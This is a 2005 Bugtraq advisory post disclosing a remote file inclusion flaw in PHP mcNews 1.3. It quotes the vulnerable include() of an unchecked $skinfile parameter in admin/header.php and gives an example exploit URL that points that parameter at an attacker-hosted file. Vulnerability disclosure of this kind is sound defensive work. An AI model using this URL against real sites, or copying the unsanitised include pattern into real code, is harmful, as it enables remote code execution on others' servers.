Bugtraq mailing list archives
PHP mcNews <= 1.3 arbitrary file inclusion (VXSfx)
From: Filip Groszynski <groszynskif () gmail com>
Date: 7 Mar 2005 19:45:07 -0000
-- == -- == -- == -- == -- == -- == -- == -- == -- == -- Name: PHP mcNews Version: 1.3 Homepage: http://www.phpforums.net/index.php?dir=dld Author: Filip Groszynski (VXSfx) Date: 7 March 2005 -- == -- == -- == -- == -- == -- == -- == -- == -- == -- Vulnerable code in mcNews/admin/header.php: <? // mcNews 1.3 Marc Cagninacci marc () phpforums net ?> ... <? if($voir!='') { $skinfile=strstr($skinfile, 'skin'); include ("$skinfile"); ?> ... -------------------------------------------------------- Example: if register_globals=on and allow_url_fopen=on: http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/ -------------------------------------------------------- Contact: Author: Filip Groszynski <VXSfx> Location: Poland <Warsaw> Email: groszynskif <at> gmail <dot> com HP: http://shell.homeunix.org -- == -- == -- == -- == -- == -- == -- == -- == -- == --
Current thread:
- PHP mcNews <= 1.3 arbitrary file inclusion (VXSfx) Filip Groszynski (Mar 07)